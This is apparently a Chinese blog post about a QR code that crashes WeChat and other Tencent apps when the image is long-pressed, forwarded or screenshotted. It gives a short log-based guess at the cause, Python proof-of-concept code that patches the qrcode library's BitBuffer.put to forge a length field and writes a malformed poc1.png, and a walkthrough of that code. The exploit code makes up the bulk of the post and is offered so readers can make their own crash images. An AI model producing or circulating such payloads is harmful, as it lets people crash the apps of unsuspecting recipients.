微信bug二维码崩溃漏洞？你要的poc来了！生成自己的二维码

前言

在昨晚，小薛因在看微信，看到在网传一张疑问的图片，发现点开长按识别，微信就会闪退，于是就好奇的去查明一下具体原理是怎么样的。

若打开图片，微信APP会出现闪退情况，经测试，小薛发现腾讯系的应用长按这张图片都会闪退，转发、截图该图片也会闪退。

日志分析

进行日志分析，可以推测是微信OCR扫描器相关功能模块，由于更新时不当处理，该QR代码使其产生error，触发闪退。

实现教程

使用poc生成代码

安装qrcode

pip install qrcode

生成代码

import qrcode
from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE

def nvwu_put(self, num, length):
    if num == 0:
        num = 233  # 制造一个伪造的长度
    for i in range(length):
        self.put_bit(((num >> (length - i - 1)) & 1) == 1)

qrcode.util.BitBuffer.put = nvwu_put

def anquannvwu():
    qr = qrcode.QRCode(2, qrcode.constants.ERROR_CORRECT_M, mask_pattern=0)

    num_data = QRData('1145141', MODE_NUMBER)
    data = QRData(b'.', MODE_8BIT_BYTE)
    hack_data = QRData(b'', MODE_8BIT_BYTE)

    # 确保所有数据都适应这个版本的最大内容长度
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)
    qr.add_data(data)
    qr.add_data(num_data)

    # 添加一个零长度的数据，使得数据的长度为233
    qr.add_data(hack_data)

    img = qr.make_image()
    img.save("./poc1.png")

if __name__ == "__main__":
    anquannvwu()

END

上面的代码做了以下工作：

1. 创建一个新的QR码，纠错等级为M，掩码模式为0。

2. 创建一个新的QR数据，字符串为’1145141’，模式为MODE_NUMBER。

3. 创建一个新的QR数据，字符串为’.’，模式为MODE_8BIT_BYTE。

4. 创建一个新的QR数据，字符串为空，模式为MODE_8BIT_BYTE。